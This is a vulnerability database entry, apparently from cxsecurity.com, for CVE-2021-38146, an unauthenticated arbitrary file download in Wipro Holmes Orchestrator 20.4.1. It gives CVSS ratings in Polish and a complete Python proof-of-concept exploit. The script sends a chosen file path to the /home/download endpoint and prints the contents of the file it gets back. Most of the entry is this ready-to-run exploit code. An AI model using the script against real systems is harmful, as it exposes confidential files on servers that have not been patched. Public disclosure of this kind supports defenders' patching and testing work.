Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download

2021.11.16
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC # Date: 05/08/2021 # Exploit Author: Rizal Muhammed @ub3rsick # Vendor Homepage: https://www.wipro.com/holmes/ # Version: 20.4.1 # Tested on: Windows 10 x64 # CVE : CVE-2021-38146 import requests as rq import argparse port = 8001 # change port if application is running on different port def file_download(host, filepath): vuln_url = "http://%s:%s/home/download" % (host, port) data = { "SearchString": filepath, "Msg": "" } hdr = { "content-type": "application/json" } resp = rq.post(vuln_url, headers=hdr, json=data) print resp.text def main(): parser = argparse.ArgumentParser( description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download", epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick" ) parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True) parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini") args = parser.parse_args() if "\\" in args.file_path: fp = args.file_path.replace("\\", "/") else: fp = args.file_path file_download(args.target_ip, fp) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top